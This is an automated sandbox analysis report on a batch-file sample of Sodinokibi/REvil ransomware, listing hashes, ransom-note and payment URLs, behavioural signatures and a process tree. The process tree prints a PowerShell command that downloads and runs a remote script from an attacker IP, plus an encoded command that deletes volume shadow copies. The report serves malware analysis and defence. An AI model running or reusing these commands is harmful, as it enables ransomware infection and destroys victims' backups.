Analysis
-
max time kernel
127s -
max time network
52s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
21-05-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
328013aa2b767f95491e4d8e9372cc46.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
328013aa2b767f95491e4d8e9372cc46.bat
Resource
win10v200430
General
-
Target
328013aa2b767f95491e4d8e9372cc46.bat
-
Size
219B
-
MD5
8da3de41f693d26688864e6e24e5c4f0
-
SHA1
229f10d9481ea1c89a085e76365149ca34ca4614
-
SHA256
de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5
-
SHA512
70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386
Malware Config
Extracted
http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46
Extracted
C:\ow20ox3utq-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8CAEF7359F44750
http://decryptor.cc/F8CAEF7359F44750
Signatures
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeBackupPrivilege 1584 vssvc.exe Token: SeRestorePrivilege 1584 vssvc.exe Token: SeAuditPrivilege 1584 vssvc.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1068 powershell.exe -
Drops file in Program Files directory 27 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\EnableStep.iso powershell.exe File opened for modification \??\c:\program files\ResumeStop.ADTS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ow20ox3utq-readme.txt powershell.exe File opened for modification \??\c:\program files\SubmitDismount.mpp powershell.exe File opened for modification \??\c:\program files\InstallRegister.dib powershell.exe File opened for modification \??\c:\program files\MountImport.mid powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ow20ox3utq-readme.txt powershell.exe File created \??\c:\program files\ow20ox3utq-readme.txt powershell.exe File opened for modification \??\c:\program files\FormatUnlock.eps powershell.exe File opened for modification \??\c:\program files\HidePublish.WTV powershell.exe File opened for modification \??\c:\program files\ResumeUse.wma powershell.exe File opened for modification \??\c:\program files\SetUnprotect.rtf powershell.exe File opened for modification \??\c:\program files\BlockMount.vsd powershell.exe File opened for modification \??\c:\program files\RevokeExpand.asx powershell.exe File opened for modification \??\c:\program files\AssertGroup.pot powershell.exe File opened for modification \??\c:\program files\FindConvertFrom.wmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ow20ox3utq-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertPop.mpg powershell.exe File opened for modification \??\c:\program files\ProtectConvert.ADTS powershell.exe File opened for modification \??\c:\program files\TestRestore.dotm powershell.exe File opened for modification \??\c:\program files\UnprotectDisable.wmf powershell.exe File opened for modification \??\c:\program files\FormatSkip.emz powershell.exe File opened for modification \??\c:\program files\LockClose.wmf powershell.exe File opened for modification \??\c:\program files\SubmitPush.svgz powershell.exe File created \??\c:\program files (x86)\ow20ox3utq-readme.txt powershell.exe File opened for modification \??\c:\program files\ConfirmSubmit.mpeg powershell.exe File opened for modification \??\c:\program files\TestCompress.jpeg powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8rn54i7917b6.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1068 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 376 wrote to memory of 1068 376 cmd.exe powershell.exe PID 1068 wrote to memory of 1780 1068 powershell.exe powershell.exe PID 1068 wrote to memory of 1780 1068 powershell.exe powershell.exe PID 1068 wrote to memory of 1780 1068 powershell.exe powershell.exe PID 1068 wrote to memory of 1780 1068 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1780 powershell.exe 1780 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:1068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1780
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1584